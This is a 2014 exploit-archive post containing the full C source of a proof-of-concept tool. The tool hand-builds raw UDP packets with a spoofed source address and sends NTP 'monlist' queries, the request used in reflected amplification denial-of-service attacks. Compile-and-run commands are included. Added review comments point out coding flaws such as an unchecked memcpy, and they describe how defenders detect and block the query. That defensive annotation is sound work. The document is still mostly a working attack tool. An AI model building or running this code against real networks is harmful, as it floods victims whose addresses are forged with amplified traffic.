
NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept
Posted Mar 19, 2014
Authored by Mark Osborne

NTP_SPQUERY.C is a spoofed "monlist query" program which can generate packets like those used in the reflected amplification NTP attacks that were common in early 2014. Written entirely in C, it requires no special libraries or header files. It is designed to run on most Linux distributions.

tags | exploit, denial of service, spoof, proof of concept
MD5 | b1b7e74fd45bd5a336855af010521b6e

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

//   PROGRAM :   NTP_SPQUERY.c
//
// AUTHOR : loud-fat-bloke / MARK OSBORNE
//
// Description:
//
// REFLECTED AMPLIFICATION NTP ATTACK
//
// A well known security journal has asked me to do a piece on NTP ddos
// and being a bit reactionary (OCD in other words)
// I figured I would show that NTP and DNS DRDoS are related and conform to a common formula.
// I have therefore converted the DNS_SPQUERY program I wrote 6 months ago into NTP_SPQUERY with minimal changes.
//
// NTP_SPQUERY.C generates the spoofed "monlist query" packets seen in the REFLECTED AMPLIFICATION NTP ATTACKS that are common in March 2014
//
//
// As part of the charity project
// "CyberAttack CyberCrime CyberWarfare Cyber-Complacency"
//
// I have tried to use a book, youtube presentations, in person lectures and Android Apps to Highlight three key cyber points :
// 1 - that in Europe a cyber attack by any group of proficient, computer-literate parties could cripple the infrastructure
// 2 - that formalised cyber security monitoring is required to prevent this - not militaristic, counter-espionage initiatives
// which are hangovers from the Cold War
// 3 - Privacy campaigners generally make things worse by assuming "cyber security" monitoring fits into the
// espionage initiatives described above
//
// charity project? - proceeds from the book, the APPs and personal appearances go to medical charity for sepsis awareness
//
//
// **** DO NO HARM WITH THIS PROGRAM *********
//
// the author has produced it for educational purposes only
//
//
/* to build and run me cut and paste the below 10 lines into your shell on a nice LINUX box
# compile me
#
gcc ntp_spquery.c -o ntp_spquery
#
# run me
# SPOOFED_S_IP NTP SERVER TARGET
./ntp_spquery 192.168.0.121 192.168.0.120
#
#
#
#
*/
// Horizontal rule that main() prints just before the hex dump of the request bytes.
char *pretty= "\n ---------------------------------------------------------------------------------- \n";
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <sys/socket.h>
#include <syslog.h>
#include <netinet/in.h>
#include <stdio.h>
// Neither udpsockfd nor n is referenced by any code shown in this file.
int udpsockfd,n;

// Program name substituted into the usage() message.
#define PROGRAM "NTP_SPQUERY"


// Header-like struct; nothing in the code shown in this file uses it, and
// main() writes the request bytes directly into buf instead.
// NOTE(review): presumably carried over from the DNS_SPQUERY program the file
// header says this was converted from - id and opcode look like DNS header
// fields rather than NTP ones; confirm before reusing.
// Bit-field ordering and packing are implementation-defined in C, so this
// struct would not be a portable description of a wire format in any case.
struct NTP_HEADER
{
unsigned short id; // identification number

unsigned char li :2; // 2-bit field (name suggests leap indicator - unverified)
unsigned char vn :3; // 3-bit field (name suggests version number - unverified)
unsigned char rb :1; // 1-bit flag, meaning not shown in this file
unsigned char eb :1; // 1-bit flag, meaning not shown in this file
unsigned char mb :1; // 1-bit flag, meaning not shown in this file
unsigned char opcode :5;
unsigned char data[10] ; // 10 trailing bytes, never filled in by the code shown
};

/*
char *pretyy= "\n \n DNS_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
*/

// Banner strings printed by main() at start-up. Both are handed to printf()
// as the format argument, so they must never contain a '%' conversion.
char *pretyy= "\n \n NTP_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
char *pretyz= " \tIs Hollywood's blueprint for Chaos coming true' by Mark Osborne\n \t ISBN-13: 978-1493581283 ISBN-10: 1493581287 \n\n";

// Request payload buffer filled in by main() and passed to spoofudp();
// only the first data_length bytes are placed in the datagram.
unsigned char buf[4000];
// Number of bytes of buf that spoofudp() is asked to send.
int data_length ;

/*


# LeapIndicator = 0 , VersionNum = 3 or 2 , Mode = 3 (Client Mode)
#NTP v2 Monlist Request :
# data = "0x17,x00,x03,x2a,x00"
#NTP v3 Monlist Request :
# data = "0x1b,x00,x03,x2a,x00"
*/

/* Fixed header sizes used when laying out the hand-built datagram. */
enum {
    IP4_HDRLEN = 20, /* IPv4 header without options, in bytes */
    UDP_HDRLEN = 8   /* UDP header only, payload not included */
};

/*
 * Build one IPv4/UDP datagram by hand in a stack buffer and send it through a
 * raw socket, so the source address in the IP header is the caller-supplied
 * string rather than an address chosen by the local stack.
 *
 * saddr, daddr  dotted-quad strings converted with inet_addr(); the result is
 *               not checked, so a malformed string is not rejected here.
 * sport, dport  UDP ports, stored in network byte order.
 * datalen       number of payload bytes copied from udppacket; it is never
 *               compared against the size of the 10000-byte buffer x.
 * udppacket     payload placed after the IP and UDP headers.
 *
 * Declared int but contains no return statement; every failure path calls
 * exit(), so the caller cannot handle errors.
 * Opening a SOCK_RAW socket requires elevated privilege on Linux.
 *
 * Defender's view: a forged source address only leaves the originating
 * network where source-address validation (RFC 2827, which the author's own
 * comment in main() refers to) is not enforced at the edge. The header
 * fields below are constants (IP ID 0, TTL 255, TOS 0), which makes packets
 * built this way easy to fingerprint in a capture.
 */
int
spoofudp (char *saddr,int sport, char *daddr, int dport, int datalen, char *udppacket)
{
int sd ;
const int on = 1;
struct ip iphdr, *iphdr_ptr; // iphdr itself is unused; only the pointer is
struct udphdr udphdr, *udphdr_ptr; // udphdr itself is unused; only the pointer is
unsigned char *data, *packet;
struct sockaddr_in sin;
unsigned char x[10000]; // stack buffer that holds the whole datagram
// No heap allocation: every pointer below aliases the stack buffer x.
packet = x ;
// NOTE(review): assigned without a cast from unsigned char[] to struct ip *;
// compilers diagnose this as an incompatible pointer type.
iphdr_ptr = x ;
// (disabled leftover) datalen = dnslength;
// UDP header starts right after the 20-byte IPv4 header (same uncast assignment).
udphdr_ptr = (packet + IP4_HDRLEN);
// Payload starts after both headers.
data = (packet + IP4_HDRLEN + UDP_HDRLEN);
// Copy the payload in. NOTE(review): datalen is unchecked, so a value above
// 10000 - 28 (or a negative one) would write outside x.
memcpy (data , udppacket ,datalen );
// IPv4 header: 5 x 32-bit words (no options), version 4.
iphdr_ptr->ip_hl =5;
iphdr_ptr->ip_v = 4;
iphdr_ptr->ip_tos = 0;
iphdr_ptr->ip_len = htons (IP4_HDRLEN + UDP_HDRLEN + datalen);
iphdr_ptr->ip_id = htons (0);
iphdr_ptr->ip_off = htons (0);
iphdr_ptr->ip_ttl = 255;
iphdr_ptr->ip_p = IPPROTO_UDP;
iphdr_ptr->ip_dst.s_addr = inet_addr (daddr );
iphdr_ptr->ip_src.s_addr = inet_addr (saddr ); /* source address taken verbatim from the caller, not from a local interface */
iphdr_ptr->ip_sum = 0; // left at zero; the author relies on the kernel to fill in the IP checksum

// UDP header
udphdr_ptr->source = htons (sport);
udphdr_ptr->dest = htons (dport);
udphdr_ptr->len = htons (UDP_HDRLEN + datalen);
udphdr_ptr->check = 0; // zero in an IPv4 UDP header means "no checksum computed" (RFC 768)
// Destination for sendto(); only family and address are set, the port stays 0.
memset (&sin, 0, sizeof (struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = iphdr_ptr->ip_dst.s_addr;
// Open a raw socket; the process exits with status 2 if this is refused.
if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror ("socket() failed ");
exit (2);
}
// IP_HDRINCL tells the kernel that the buffer already starts with an IP
// header. Author's note: nearly all Linux kernels allow this, while many
// BSD, Sun, AIX and HP systems do not. (On Linux, raw(7) documents
// IPPROTO_RAW as already implying IP_HDRINCL.)
if (setsockopt (sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) {
perror ("setsockopt() failed to set IP_HDRINCL ");
exit (3);
}
// Send exactly one datagram: headers plus datalen payload bytes.
if (sendto (sd, packet, IP4_HDRLEN + UDP_HDRLEN + datalen, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0) {
perror ("sendto() failed ");
exit (EXIT_FAILURE);
}
// Close socket descriptor. Control then falls off the end of an int
// function without returning a value.
close (sd);
}


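/*
 * Print the command-line synopsis to stderr and terminate the process with
 * exit status 1. Never returns to the caller.
 *
 * The original definition relied on the implicit-int return type, which was
 * removed from the language in C99, and returned no value; the function is
 * now declared void with an explicit empty parameter list.
 */
void
usage (void)
{
fprintf(stderr,"Program Usage: \n %s SOURCE_DOT_ADDR DEST_DOT_ADDR \n\n", PROGRAM);
exit(1);
}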

// out and len1..len3 are not referenced by any code shown in this file.
unsigned char out[1000];
int len1 = 0, len2 = 0 ,len3 = 0 ;
// Loop index for the hex dump in main().
int pants;

/*
 * Entry point: expects exactly two arguments (argv[1] is used as the source
 * address written into the IP header, argv[2] as the destination), prints a
 * banner and a hex dump of the request bytes, then hands one 9-byte UDP
 * payload to spoofudp() with source port 4950 and destination port 123.
 *
 * Defender's view: the request bytes decode as an NTP mode 7 (private)
 * request with implementation 3 and request code 0x2a (42), the "monlist"
 * query. A small request of this shape arriving on UDP/123, followed by a
 * much larger reply, is the pattern to alert on. On ntpd the query is shut
 * off with `disable monitor` or a `restrict ... noquery` policy in ntp.conf,
 * and the forged source address is what RFC 2827 ingress filtering drops.
 */
int
main( int argc , char *argv[])
{
char *out_temp; // never used
if ( argc != 3 )
usage();
// NOTE(review): the banner pointers are passed as the printf format string.
// They are constants with no '%' in them, so this is harmless here, but
// printf("%s", ...) is the safer habit.
/* */ printf(pretyy ) ;
/* */ printf(pretyz ) ;
printf(" Spoof Source ip: \t \t %s \n Dest ip: \t \t %s \n \n \n ", argv[1] ,
argv[2] );
// Zero the first 255 bytes of buf (a global, so already zero at start-up).
memset(buf,0x00,0xfF);
// Write the five request bytes (%c emits the 0x00 bytes as well).
// 0x17 = LI 0, version 2, mode 7; 0x03 = implementation; 0x2a = request code.
// NOTE(review): buf is unsigned char[] but sprintf() expects char *.
sprintf(buf,"%c%c%c%c%c", 0x17,0x00,0x03,0x2a,0x00);

// Nine bytes are sent: the five written above plus four that are still zero.
data_length = 9 ;
printf(pretty ) ;
// Hex dump of the first 30 bytes of buf, which is more than the
// data_length bytes that actually go into the datagram.
for (pants=0; pants < 30 ; pants++ )
printf("%x ", buf[pants]);
//

printf("\nNTP PACKET len \t \t %i \n" , data_length ) ;
//
// Sends the single hand-built UDP datagram.
// Author's note: written for an RFC 2827 survey that was never finished.
// The int declared for spoofudp() is ignored; it exits on any failure.
spoofudp (argv[1] ,4950, argv[2] , 123 , data_length, buf );

return 0;
}